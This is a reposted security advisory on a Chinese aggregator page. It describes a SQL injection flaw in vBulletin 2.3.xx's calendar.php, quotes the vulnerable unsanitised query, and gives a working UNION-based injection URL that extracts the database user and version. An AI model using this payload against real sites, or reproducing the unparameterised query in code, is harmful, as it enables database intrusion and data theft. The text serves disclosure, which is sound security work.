最新文章专题视频专题问答1问答10问答100问答1000问答2000关键字专题1关键字专题50关键字专题500关键字专题1500TAG最新视频文章推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37视频文章20视频文章30视频文章40视频文章50视频文章60 视频文章70视频文章80视频文章90视频文章100视频文章120视频文章140 视频2关键字专题关键字专题tag2tag3文章专题文章专题2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章专题3
当前位置: 首页 - 科技 - 知识百科 - 正文

vBulletin Forum 2.3.xx SQL Injection

来源:动视网 责编:小采 时间:2020-11-27 19:01:32
文档

vBulletin Forum 2.3.xx SQL Injection

vBulletin Forum 2.3.xx SQL Injection: vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.-------- Cut from line 585 in calendar.php ----------else if ($action == edit){ $eventinfo = $DB_site->query_first(SELECT allowsmilies,public,us
推荐度:
导读vBulletin Forum 2.3.xx SQL Injection: vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.-------- Cut from line 585 in calendar.php ----------else if ($action == edit){ $eventinfo = $DB_site->query_first(SELECT allowsmilies,public,us



vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

文档

vBulletin Forum 2.3.xx SQL Injection

vBulletin Forum 2.3.xx SQL Injection: vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.-------- Cut from line 585 in calendar.php ----------else if ($action == edit){ $eventinfo = $DB_site->query_first(SELECT allowsmilies,public,us
推荐度:
标签: 脚本 sql injection
  • 热门焦点

最新推荐

猜你喜欢

热门推荐

专题
Top